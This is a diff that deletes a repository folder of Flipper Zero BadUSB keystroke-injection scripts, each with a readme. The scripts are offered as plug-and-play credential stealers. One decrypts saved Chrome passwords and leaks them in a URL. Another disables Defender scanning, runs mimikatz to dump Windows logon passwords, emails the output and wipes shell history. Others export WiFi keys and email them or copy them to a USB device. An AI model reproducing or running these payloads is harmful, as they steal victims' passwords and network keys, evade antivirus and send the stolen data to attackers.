STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

■ ■ ■ ■ ■ ■

PasswordStuff/ChromePasswords/ChromePasswords.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Grabs saved Passwords from Chrome
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DELAY 5000
6	-	GUI r
7	-	DELAY 250
8	-	STRING powershell
9	-	ENTER
10	-	DELAY 2500
11	-	STRING pwsh
12	-	ENTER
13	-	DELAY 2500
14	-	STRING $d=Add-Type -A System.Security
15	-	ENTER
16	-	STRING $p='public static'
17	-	ENTER
18	-	STRING $g=""")]$p extern"
19	-	ENTER
20	-	STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
21	-	ENTER
22	-	STRING $m="[MarshalAs(UnmanagedType.LP"
23	-	ENTER
24	-	STRING $q='(s,i)'
25	-	ENTER
26	-	STRING $f='(p s,int i)'
27	-	ENTER
28	-	STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
29	-	ENTER
30	-	STRING $u=[Security.Cryptography.ProtectedData]
31	-	ENTER
32	-	STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
33	-	ENTER
34	-	STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
35	-	ENTER
36	-	STRING $l=@()
37	-	ENTER
38	-	STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"\|ConvertFrom-Json).os_crypt.encrypted_key
39	-	ENTER
40	-	STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
41	-	ENTER
42	-	STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
43	-	ENTER
44	-	STRING $c=[W]::B($s,5)
45	-	ENTER
46	-	STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
47	-	ENTER
48	-	STRING $e=[byte[]]::new($k-31)
49	-	ENTER
50	-	STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e\|%{[char]$_})-join''}
51	-	ENTER
52	-	STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
53	-	ENTER
54	-	STRING start-process "chrome" "--headless http://localhost:8000/?$r"
55	-	ENTER
56	-	DELAY 1000
57	-	STRING exit
58	-	ENTER
59	-	DELAY 250
60	-	STRING exit
61	-	ENTER
62	-

■ ■ ■ ■ ■ ■

PasswordStuff/ChromePasswords/readme.md

1	-
2	-	# ChromePasswords
3	-	Grabs saved Passwords from Chrome.
4	-
5	-	## How to use?
6	-
7	-	This script is plug and play.
8	-
9	-
10	-	## Features
11	-
12	-	- open powershell
13	-	- save chrome profile
14	-	- paste profile to a file
15	-
16	-	## Feedback
17	-
18	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
19	-
20	-
21	-
22	-
23	-
24	-
25	-	## Support
26	-
27	-	For support, contact me via Discord "UNC0V3R3D#8662".
28	-
29	-
30	-	## Meta
31	-
32	-
33	-	- If you want to sponsor me on Patreon, the link is on my profile.
34	-
35	-
36	-

■ ■ ■ ■ ■ ■

PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Shows all saved passwords.
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DELAY 900
6	-	GUI r
7	-	DELAY 1000
8	-	STRING powershell
9	-	ENTER
10	-	DELAY 1000
11	-	STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
12	-	ENTER
13	-	DELAY 5000
14	-	STRING wbpv28821@
15	-	ENTER
16	-	STRING .\WebBrowserPassView.exe
17	-	ENTER
18	-	DELAY 3000
19	-	CTRL A
20	-	CTRL S
21	-	DELAY 1000
22	-	STRING export.html
23	-	TAB
24	-	STRING h
25	-	ENTER
26	-	DELAY 1000
27	-	ALT F4
28	-	DELAY 1000
29	-	STRING Start-Process msedge.exe 'file:///C:/temp/export.html --inprivate'
30	-	ENTER
31	-	DELAY 2000
32	-	ALT TAB
33	-	DELAY 1000
34	-	STRING cd \
35	-	ENTER
36	-	STRING rmdir -R \temp
37	-	ENTER
38	-	STRING EXIT
39	-	ENTER
40	-

■ ■ ■ ■ ■ ■

PasswordStuff/Show_Saved_Password/readme.md

1	-
2	-	# Show_Saved_Passwords
3	-	Shows all saved passwords.
4	-
5	-	## How to use?
6	-
7	-	This script is plug and play.
8	-
9	-
10	-	## Features
11	-
12	-	- open powershell
13	-	- download webbrowserview.exe
14	-	- save passwords from webbrowsers
15	-
16	-	## Feedback
17	-
18	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
19	-
20	-
21	-
22	-
23	-
24	-
25	-	## Support
26	-
27	-	For support, contact me via Discord "UNC0V3R3D#8662".
28	-
29	-
30	-	## Meta
31	-
32	-
33	-	- If you want to sponsor me on Patreon, the link is on my profile.
34	-
35	-
36	-

■ ■ ■ ■ ■ ■

PasswordStuff/Simple_User_Password_Grabber/Simple_User_Password_Grabber.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Grabs the current Windows User password.
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DEFAULT_DELAY 450
6	-	DELAY 1500
7	-	GUI r
8	-	STRING powershell
9	-	CTRL-SHIFT ENTER
10	-	DELAY 600
11	-	ALT y
12	-	STRING Set-MpPreference -ExclusionPath C:\Users
13	-	ENTER
14	-	STRING exit
15	-	ENTER
16	-	GUI r
17	-	STRING cmd
18	-	CTRL-SHIFT ENTER
19	-	DELAY 600
20	-	ALT y
21	-	STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
22	-	ENTER
23	-	DELAY 4000
24	-	STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
25	-	ENTER
26	-	STRING privilege::debug
27	-	ENTER
28	-	STRING sekurlsa::logonPasswords full
29	-	ENTER
30	-	STRING exit
31	-	ENTER
32	-	STRING del %TEMP%\pw.exe
33	-	ENTER
34	-	STRING exit
35	-	ENTER
36	-	GUI r
37	-	STRING powershell
38	-	CTRL-SHIFT ENTER
39	-	DELAY 600
40	-	ALT y
41	-	STRING Remove-MpPreference -ExclusionPath C:\Users
42	-	ENTER
43	-	STRING $SMTPServer = 'smtp.gmail.com'
44	-	ENTER
45	-	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
46	-	ENTER
47	-	STRING $SMTPInfo.EnableSsl = $true
48	-	ENTER
49	-	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
50	-	SHIFT 2
51	-	STRING gmail.com', 'PASSWORDHERE');
52	-	ENTER
53	-	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
54	-	ENTER
55	-	STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
56	-	SHIFT 2
57	-	STRING gmail.com'
58	-	ENTER
59	-	STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
60	-	SHIFT 2
61	-	STRING gmail.com')
62	-	ENTER
63	-	STRING $ReportEmail.Subject = 'Hello from the ducky'
64	-	ENTER
65	-	STRING $ReportEmail.Body = 'Attached is your duck report.'
66	-	ENTER
67	-	STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
68	-	ENTER
69	-	STRING $SMTPInfo.Send($ReportEmail)
70	-	ENTER
71	-	DELAY 4000
72	-	STRING exit
73	-	ENTER
74	-	GUI r
75	-	STRING powershell
76	-	CTRL-SHIFT ENTER
77	-	DELAY 600
78	-	ALT y
79	-	STRING del c:\pwlog.txt
80	-	ENTER
81	-	STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
82	-	ENTER
83	-	STRING exit
84	-	ENTER
85	-	GUI l
86	-

■ ■ ■ ■ ■ ■

PasswordStuff/Simple_User_Password_Grabber/readme.md

1	-
2	-	# Simple_user_Password_Grabber
3	-	Grabs the current Windows User password.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	-
9	-	- change link to mimikatz.exe "('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')"
10	-	- change email credential 1 "('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
11	-	- change email credential 2 "gmail.com', 'PASSWORDHERE');"
12	-	- change email credential 3 "$ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@"
13	-	- change email credential 4 "$ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@"
14	-
15	-
16	-	## Features
17	-
18	-	- open powershell
19	-	- download mimikatz
20	-	- get user password
21	-	- send password to email
22	-
23	-	## Feedback
24	-
25	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
26	-
27	-
28	-
29	-
30	-
31	-
32	-	## Support
33	-
34	-	For support, contact me via Discord "UNC0V3R3D#8662".
35	-
36	-
37	-	## Meta
38	-
39	-
40	-	- If you want to sponsor me on Patreon, the link is on my profile.
41	-
42	-
43	-

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys/StealWifiKeys.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DELAY 500
6	-	WINDOWS d
7	-	DELAY 500
8	-	WINDOWS r
9	-	DELAY 500
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 800
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 800
16	-	ALT y
17	-	DELAY 500
18	-	GUI UP
19	-	DELAY 600
20	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
21	-	ENTER

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys/readme.md

1	-
2	-	# StealWifiKeys
3	-	Steals all of the saved Wifi Passwords and stores them into a file.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play. You will need to do the following changes:
8	-
9	-	- change destination path "-DestinationPath C:PUT PATH HERE\ResultsPassword.zip"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- grab wifi keys
16	-	- store keys to a file
17	-
18	-	## Feedback
19	-
20	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
21	-
22	-
23	-
24	-
25	-
26	-
27	-	## Support
28	-
29	-	For support, contact me via Discord "UNC0V3R3D#8662".
30	-
31	-
32	-	## Meta
33	-
34	-
35	-	- If you want to sponsor me on Patreon, the link is on my profile.
36	-
37	-
38	-

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys_Email/StealWifiKeys_Email.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DEFAULT_DELAY 600
6	-	DELAY 500
7	-	WINDOWS r
8	-	DELAY 500
9	-	STRING cmd
10	-	ENTER
11	-	DELAY 200
12	-	STRING cd %USERPROFILE% & netsh wlan show profiles \| findstr "All" > a.txt
13	-	ENTER
14	-	STRING echo SETLOCAL EnableDelayedExpansion^
15	-	ENTER
16	-	ENTER
17	-	STRING for /f "tokens=5*" %%i in (a.txt) do (^
18	-	ENTER
19	-	ENTER
20	-	STRING set val=%%i %%j^
21	-	ENTER
22	-	ENTER
23	-	STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
24	-	ENTER
25	-	ENTER
26	-	STRING echo !val!^>^>b.txt) > filter.bat
27	-	ENTER
28	-	STRING filter.bat
29	-	DELAY 300
30	-	ENTER
31	-	STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear \| findstr /c:"Key Content" & echo.) > Log.txt
32	-	ENTER
33	-	DELAY 1000
34	-	STRING exit
35	-	DELAY 500
36	-	ENTER
37	-	DELAY 1000
38	-	WINDOWS r
39	-	DELAY 500
40	-	STRING powershell
41	-	ENTER
42	-	DELAY 1000
43	-	STRING del .\a.txt
44	-	ENTER
45	-	STRING del .\b.txt
46	-	ENTER
47	-	STRING del .\filter.bat
48	-	ENTER
49	-	STRING $SMTPServer = 'smtp-mail.outlook.com'
50	-	ENTER
51	-	STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
52	-	ENTER
53	-	STRING $SMTPInfo.EnableSSL = $true
54	-	ENTER
55	-	STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')
56	-	ENTER
57	-	STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
58	-	ENTER
59	-	STRING $ReportEmail.From = 'YOUR EMAIL'
60	-	ENTER
61	-	STRING $ReportEmail.To.Add('email to send to')
62	-	ENTER
63	-	STRING $ReportEmail.Subject = 'WiFi key grabber'
64	-	ENTER
65	-	STRING $ReportEmail.Body = (Get-Content Log.txt \| out-string)
66	-	ENTER
67	-	STRING $SMTPInfo.Send($ReportEmail)
68	-	ENTER
69	-	DELAY 3000
70	-	STRING del Log.txt
71	-	DELAY 500
72	-	STRING exit
73	-	ENTER
74	-

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys_Email/readme.md

1	-
2	-	# StealWifiKeys_Email
3	-	Steals all of the saved Wifi Passwords and stores them into a file, then sends the file via email.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	-
9	-	- change credentials "System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')"
10	-	- change credentails "$ReportEmail.From = 'YOUR EMAIL'"
11	-	- change credentials "$ReportEmail.To.Add('email to send to')"
12	-
13	-
14	-	## Features
15	-
16	-	- open powershell
17	-	- grab wifi keys
18	-	- store keys to a file
19	-	- send file via email
20	-
21	-	## Feedback
22	-
23	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
24	-
25	-
26	-
27	-
28	-
29	-
30	-	## Support
31	-
32	-	For support, contact me via Discord "UNC0V3R3D#8662".
33	-
34	-
35	-	## Meta
36	-
37	-
38	-	- If you want to sponsor me on Patreon, the link is on my profile.
39	-
40	-
41	-

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt

1	-	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	-	REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
3	-	REM Version: 1.0
4	-	REM Category: Passwords
5	-	DELAY 750
6	-	WINDOWS d
7	-	DELAY 1000
8	-	WINDOWS r
9	-	DELAY 900
10	-	STRING powershell Start-Process powershell -Verb runAs
11	-	ENTER
12	-	DELAY 750
13	-	LEFTARROW
14	-	ENTER
15	-	DELAY 900
16	-	ALT y
17	-	DELAY 900
18	-	GUI UP
19	-	DELAY 900
20	-	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here

■ ■ ■ ■ ■ ■

PasswordStuff/StealWifiKeys_onUSB/readme.md

1	-
2	-	# StealWifiKeys_onUSB
3	-	Steals all of the saved Wifi Passwords and stores them into a file, then puts the file on a usb device connected to the target pc.
4	-
5	-	## How to use?
6	-
7	-	This script is not plug and play and only for experienced users. You will need to do the following changes:
8	-
9	-	- change path to the usb device "-DestinationPath File path on USB device here"
10	-
11	-
12	-	## Features
13	-
14	-	- open powershell
15	-	- grab wifi keys
16	-	- store keys to a file on a usb device
17	-
18	-	## Feedback
19	-
20	-	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
21	-
22	-
23	-
24	-
25	-
26	-
27	-	## Support
28	-
29	-	For support, contact me via Discord "UNC0V3R3D#8662".
30	-
31	-
32	-	## Meta
33	-
34	-
35	-	- If you want to sponsor me on Patreon, the link is on my profile.
36	-
37	-
38	-

Delete PasswordStuff directory